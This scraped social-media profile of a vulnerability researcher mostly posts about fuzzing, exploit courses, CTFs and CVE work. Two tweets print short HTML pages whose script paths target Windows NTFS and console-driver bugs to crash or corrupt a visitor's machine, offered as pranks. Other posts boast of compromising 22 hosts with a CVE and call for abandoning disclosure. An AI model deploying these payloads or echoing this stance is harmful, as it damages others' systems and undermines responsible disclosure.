f00fc7c800 Profile Banner
f00fc7c800 Profile
f00fc7c800

@f00fc7c800

1,392
Followers
5,285
Following
126
Media
2,535
Statuses

.

IA32_LSTAR_MSR+SYSCALL_NR0XC82
Joined February 2019
Don't wanna be here? Send us removal request.
Pinned Tweet
@f00fc7c800
f00fc7c800
9 months
leaving this for myself for later.. c3 on the save:))
Tweet media one
0
0
10
@f00fc7c800
f00fc7c800
3 years
Hello twitter, since it's christmas and everybody get's a present I thought of giving one too: I finish part one of analysing browser process up to the point where we have the renderer starting , how you can attach to it and where to bp to debug it. Enjoy
3
87
216
@f00fc7c800
f00fc7c800
3 years
I strongly recommend checking this if chrome is in your interest: and also this and also
0
35
98
@f00fc7c800
f00fc7c800
1 year
ohh wow didn't even knew this exists: cool Binary Heap Exploitation on OP-TEE
0
21
80
@f00fc7c800
f00fc7c800
3 years
windbg.exe chrome.exe -G -o --renderer-startup-dialog --no-sandbox --wait-for-debugger-children=renderer --renderer-process-limit=1 --allow-pre-commit-input --allow-sandbox-debugging and .childdbg 1 in case you want to debug a renderer :)) and a tone of patience
0
8
60
@f00fc7c800
f00fc7c800
9 months
Found my first 0day yesterday, will publish video and details little bit later today
6
0
43
@f00fc7c800
f00fc7c800
6 months
Ok so as promissed working exploit for CVE-2021-3345. Soon after i sleep and rest a little the blogpost incoming :) . Mom we did it we recreated stuff from whoami :)
1
20
38
@f00fc7c800
f00fc7c800
2 years
OSED:✅
Tweet media one
4
0
30
@f00fc7c800
f00fc7c800
8 months
Officially i can say i grew up :)
Tweet media one
2
0
23
@f00fc7c800
f00fc7c800
3 years
whaaaaaaaaaaaaaaat! this crazy never knew microsoft had a dedicated page for browser exploitation: check it out, i know one for sure will check it out tomorrow after i wake up:?
0
9
21
@f00fc7c800
f00fc7c800
8 months
just for the lulz, from fuzzing found a couple off oom/null ptr deref bugs on android : android : 11 , lulz :)))))
1
5
19
@f00fc7c800
f00fc7c800
1 year
So I did a thing: during z2a course we had a challenge to analyse blacklotus: this is 2nd part of analysis for bootkit component Ps sorry for images not loading if anyone know how to solve that bug ping me pls
4
6
16
@f00fc7c800
f00fc7c800
7 months
@AzakaSekai_ @58_158_177_102 Cool so also digi which is Romanian teleco company was targeted xddd
2
0
17
@f00fc7c800
f00fc7c800
7 months
@AzakaSekai_ @58_158_177_102 Link to the pdf from git please wanna check someting
1
0
16
@f00fc7c800
f00fc7c800
2 years
@SergeyI49013776 83 only and it can do stuff like this !!? imagine when it hits 140/150 :))
2
1
17
@f00fc7c800
f00fc7c800
6 months
so am yeah running on ubuntu 18.04 your exploit would fail :) Before and after the overflow . You would only need to adjust it a little in order to get it running tho :) stay tuned soon a blog post :)
Tweet media one
Tweet media two
0
1
17
@f00fc7c800
f00fc7c800
4 years
took the advice of @maxpl0it and i have applied,tho i got denied for summer intership ,they were full already,ahh that's it maybe next year,but highest hopes for this one haha,still feeling like too big of a step while i still dont know how to pwn,just how2fuzz a little
Tweet media one
2
1
15
@f00fc7c800
f00fc7c800
2 years
I did another thing. A full ce(code exec) exploit for an old ruby interpreter cve . basically CVE-2016-2338 full poc. no dep bypass no aslr bypass + heap spray. enjoy. vuln ruby vers:2.2.2
0
3
15
@f00fc7c800
f00fc7c800
1 year
cve 2019-05939 :) if you know you know ... :))
Tweet media one
0
0
13
@f00fc7c800
f00fc7c800
6 months
Cool thing i have found out: u can have shellcode encoded only in wifi packets. here u can see arm encoded shellcode :)
Tweet media one
1
3
11
@f00fc7c800
f00fc7c800
8 months
ok never tought that this day will come :) happy af :) burning coolest but i have ever found :)
Tweet media one
1
0
11
@f00fc7c800
f00fc7c800
4 years
just pwned 22 hosts using CVE-2020-17519 haha. Way to start the day
0
1
9
@f00fc7c800
f00fc7c800
4 years
one more thing :)) cool to troll your friends if u want. <html> <head> <title> "Get Pwned!!"" </title> </head> <body> <h1>"Get Pwned!!""</h1> <script src = "file://///c:\\:$i30:$bitmap" defer></script> </body> </html>
2
0
8
@f00fc7c800
f00fc7c800
7 months
1
0
9
@f00fc7c800
f00fc7c800
3 years
@kylieengineer Agreed but also cs curriculums should update their content and make it mandatory to at least after 3 or 4 years of pure cs to have another one or two years where each student picks a category from cyber and a specialises in that + in that 1 or 2 years play ctf's 1/2
1
0
8
@f00fc7c800
f00fc7c800
9 months
anyways carry on... :)) cve2019-0539
1
2
8
@f00fc7c800
f00fc7c800
2 years
@CristiVlad25 Best advice I can give for learning reverse engineering is don't. Learn engineering first than reverse comes naturally
1
0
7
@f00fc7c800
f00fc7c800
9 months
@sshell_ DAMN...... lorenzo be cooking fr fr
0
0
8
@f00fc7c800
f00fc7c800
8 months
i want a video on kernel pool exploitation instead of reading the papers honestly,....
1
1
8
@f00fc7c800
f00fc7c800
6 months
public service anouncement: i started to do the necessary research in order to do the full rce on android bug
0
0
7
@f00fc7c800
f00fc7c800
4 years
Me: fuzzez VirtualBox with Sandsifter. Literally after 60 secs: finds crash. Gives it to a friend for crash triage. Same friend will yell at me for twitting this after he sees this.
0
0
7
@f00fc7c800
f00fc7c800
7 months
partial blog of staage one shellcode loader from old hacking team malware analysis blog done :
1
2
7
@f00fc7c800
f00fc7c800
1 year
End of a cool week. That's all . Little sad :/ 🙏🙏 Grateful af for this cool experience :)
Tweet media one
0
0
6
@f00fc7c800
f00fc7c800
7 months
ps i have to mention that this wasn't my sole work, i almost forogt sorry guys. mUCH love to thezee guyzz @reubensammut @marcudanf for helping me with za fuzzer and za RCA
1
0
7
@f00fc7c800
f00fc7c800
2 years
Only god and OSED judges can judge me now :))) Wish me luck
Tweet media one
1
0
7
@f00fc7c800
f00fc7c800
3 years
1/4 Hi twitter i did something interesting again: since most of docs is outdated i documented one of chrome's processes, more precisely content process. here is the link to it . Sorry for how it looks i promise i will fix it later today.
3
5
7
@f00fc7c800
f00fc7c800
2 years
@moyix do you think it's possible to assist in windows heap exploitation ?
0
0
7
@f00fc7c800
f00fc7c800
4 years
Ahh miracle of Christmas. syzkaller I love you!
Tweet media one
0
1
6
@f00fc7c800
f00fc7c800
3 years
Into AEG and symbolic execution? Most of the time when I was searching for tutorials on how to do heap AEG I ended up finding nothing but only fmtstr or stack/buf overflow AEG. This is really good because it shows a practical UAF/Double free AEG. .Enjoy!
0
0
6
@f00fc7c800
f00fc7c800
9 months
some side work i figured out it might be interesting: im still working on stuff not done but , on tl;dr almost done on CVE 2022_23591 there's still some testing and tweeking to do
0
4
6
@f00fc7c800
f00fc7c800
9 months
Now i know now to crack a kernel cve but not know to use a laundry service in Uk :))))
1
0
6
@f00fc7c800
f00fc7c800
6 months
How it started vs How it's going @reubensammut
Tweet media one
Tweet media two
0
0
6
@f00fc7c800
f00fc7c800
3 years
Next week's new beginnings: OSED course! Hype AF!
3
0
6
@f00fc7c800
f00fc7c800
7 months
if za ppl ask you how is it going , stay pozitive : i got 5 denies one after another: zdi,interpol,europol,palo alto, research paper denied
Tweet media one
2
0
5
@f00fc7c800
f00fc7c800
1 year
@ZeroDaysCTF that's all you need :)))
1
0
5
@f00fc7c800
f00fc7c800
2 years
I did a thing. While studying windows and how to hack ruby , i search if anyone ever did a heap spray with ruby in win7. Turns out nobody did so.... here i did it :) hope ppl find it interesting at least . Happy hacking! ps. 0c0c0c0c
0
1
5
@f00fc7c800
f00fc7c800
3 years
Thx @PNNLab . The trophee looks dope af!
Tweet media one
Tweet media two
0
0
5
@f00fc7c800
f00fc7c800
6 months
So amm in regards to that gnupgp nday i was talking about... Major news: exploit is done i need it to uploade it to github and write the write-up... Kudos to @reubensammut for finishing touches. Dopes experience into deveoping an nday :)
1
0
5
@f00fc7c800
f00fc7c800
3 years
@fadis_ Wtf 4 real? Than no more gcc randomshit.c?
1
0
5
@f00fc7c800
f00fc7c800
2 years
cat <<' EOF' >> brucon.txt
Tweet media one
0
0
5
@f00fc7c800
f00fc7c800
7 months
roses are red, violets are blue my life is chaos and im sad. dont do cyber... life sucks. annyoing to talk to parents to hear me and be like no.... hacking is not worth...
1
0
5
@f00fc7c800
f00fc7c800
3 years
Taking a break from twitter and discord for now.... Need to address some mental issues for now. Wont be reachable for a while
2
0
5
@f00fc7c800
f00fc7c800
1 year
@HackenProof Practice > theory, never give up, have resilience, and don't forget you a hacker so genuinely ppl won't agree with u , and so just don't listen to them and do you thing find your space and peace and hack the planet!
0
0
5
@f00fc7c800
f00fc7c800
8 months
So i did a thing, i have wrote about .cff file format i might have messed up stuff if anyhting feel free to boo me in dm's :) wrote about it's format altough documented , anyways whatever blah blah
2
1
5
@f00fc7c800
f00fc7c800
2 years
I found an usless stack overflow in foxit. Enjoy! Don't think it's exploitable tho.. as this is only triggerable from debugger only
0
0
3
@f00fc7c800
f00fc7c800
9 months
watch'out for them scammers kids :)) merry christmas you filthy animal :))
Tweet media one
1
0
4
@f00fc7c800
f00fc7c800
7 months
Yes my github bitch… I just want it to have as a cve. Is it too much ? Not looking for money lol 😂 😂😂
Tweet media one
4
0
4
@f00fc7c800
f00fc7c800
8 months
@_lauritz_ @FusionAuth Burn it on public web. Fuck any disclosure. Let the world burn
0
0
2
@f00fc7c800
f00fc7c800
4 years
I got borred so here is goes: <html> <head> <title> "Get Pwned!!"" </title> </head> <body> <h1>"Get Pwned!!""</h1> <script src = "file://///\.\globalroot\device\condrv\kernelconnect" defer></script> </body> </html>
2
1
4
@f00fc7c800
f00fc7c800
3 years
Wanna go full focus on OSED, so I will go offline until than. Bye twitter!
0
0
4
@f00fc7c800
f00fc7c800
4 years
Christmas is the most beautiful time of the year. I just love it! Generally it comes with good things for me,this year came with 2 bugs a null ptr dereference and an incremental bug in kernel,previous years came with a gf,hope everyone is having an awesome time!
0
0
4
@f00fc7c800
f00fc7c800
3 years
And so it starts!
Tweet media one
1
0
4
@f00fc7c800
f00fc7c800
3 years
I did this maybe someone finds it interesting Very soon also a paper alongside it describing the attacks were used for getting the private key and their implementation on better keygen which will use v8.
0
1
4
@f00fc7c800
f00fc7c800
2 years
do ppl know about this ? seems pretty kewl !
0
0
4
@f00fc7c800
f00fc7c800
1 year
I wanted to I guess "experiment" with sc a little on macOS so I wrote some notes from a cool video Basically I tried to compress what this guy told in his video :) Maybe someone finds it interesting Credits goes to this guy
0
2
4
@f00fc7c800
f00fc7c800
3 years
Failed OSED with capital F...... f u retn 0x12 for fucking up my stack and making me give up after searching through shitty gadgets =))) also wan't in the mood to reverse and write custom shellcode.....
1
0
4
@f00fc7c800
f00fc7c800
2 years
2023: OSEE + faculta! Am zis. #2023aratabine :)))
0
0
1
@f00fc7c800
f00fc7c800
3 years
@HawesRT @VerSprite would have jumped on this but already got one internship upcoming :) But maybe next year who knows :))
1
0
3
@f00fc7c800
f00fc7c800
3 years
me: CryptoHacking or Programming ? me:Chooses ECC ECSDA ..... After 24hrs... me:goes cries in corner for doing :))
0
0
3
@f00fc7c800
f00fc7c800
3 years
Fuck this is sooo long but is good for ppl who wanna learn sea of nodes:
0
0
3
@f00fc7c800
f00fc7c800
1 year
0
0
2
@f00fc7c800
f00fc7c800
3 years
Sometimes I like starcraft!
Tweet media one
0
0
3
@f00fc7c800
f00fc7c800
2 years
very smart person. Please sub to him! also we need this in higher quality image!
0
0
3
@f00fc7c800
f00fc7c800
4 years
had a tone of fun playing Hacking in the Kill Chain @HakanNohre , documentation is just pure love,and the lab was a tone of fun.Thx for such experience @Grayhat_Con . Looking forward to EX-1018- Fuzzing with AFL by: @michael_macnair
0
0
3
@f00fc7c800
f00fc7c800
3 years
I need to learn this defenetly!
@awesomekling
Andreas Kling
3 years
Learning how to say "I don't know enough about this to have an opinion" is probably one of the best investments you can make in yourself.
3
23
225
0
0
3
@f00fc7c800
f00fc7c800
3 years
well tho i sucked at @hardwear_io cts i found out stuff and had fun. Got stuck at signal3 ... tho i knew it was OOK i got stuck while trying to demodulate the signal.... well it is what it is,at least now i know that i can apply filter and get from floats array of bins numbers
1
2
3
@f00fc7c800
f00fc7c800
4 years
yes papito please check me on this one also!!! yes sirrr!
Tweet media one
0
0
3
@f00fc7c800
f00fc7c800
9 months
probabil singur om care vreodata ever m-a impis precum kobe si machael. Fking respect sir! Daca datorez cuiva chestii esti tu ! Fking true friend! Much respect and love! Again rupele fasu
@FetchDEX
FeDEX
9 months
Cyber Mimic Defense CTF was so much fun. From car hacking and AI hacking all the way to the Great Wall.
Tweet media one
Tweet media two
Tweet media three
Tweet media four
2
7
57
1
0
3
@f00fc7c800
f00fc7c800
4 years
while preparing for the upcoming interviews and doing my assignments from @Davkorcz fuzzing course i found that an issue he reported back ago which seems to be closed is still valid.The best way to start your day.Haha teacher do you think it's still worth to be reported ?
Tweet media one
1
0
3
@f00fc7c800
f00fc7c800
4 years
Lol, funny af
@kazukidevnull
Kazu Spotted something shiny!
4 years
some lovely words from the excellent @McLabraid 😂
0
0
7
0
0
2
@f00fc7c800
f00fc7c800
4 years
dharma grammer is 💎 & 💕 can't wait to dig now into how to write custom fuzzers.Never thaught this would be so easy.Alawys when reading about fuzzing it seemed hard,now all seems crystal clear
0
0
3
@f00fc7c800
f00fc7c800
3 years
One CTF Down! @DianaInitiative . A little bit worst accuracy than the previous tournament
Tweet media one
Tweet media two
0
3
3
@f00fc7c800
f00fc7c800
3 years
based on Abdelhamid Naceri DOS bug i created a poc on github . Cool Bug! I still wanna go and dig in it to see if it could be combined by dunno RPC to be turning it into a R-DOS
2
0
3
@f00fc7c800
f00fc7c800
4 years
Let's go cant w8 to take part in this ctf right before my final high school exam! #hackasat
Tweet media one
0
0
3
@f00fc7c800
f00fc7c800
4 years
so after finishing the @ADALogics course for fuzzing,I'm feeling awesome i have already started to find some bugs in some different software,now for twitter #infosec ppl,what training would you recommend for fuzzing hypervisors/vuln research ?
1
1
3
@f00fc7c800
f00fc7c800
4 years
this is cool . Thx @goobstersec showing me this
0
0
3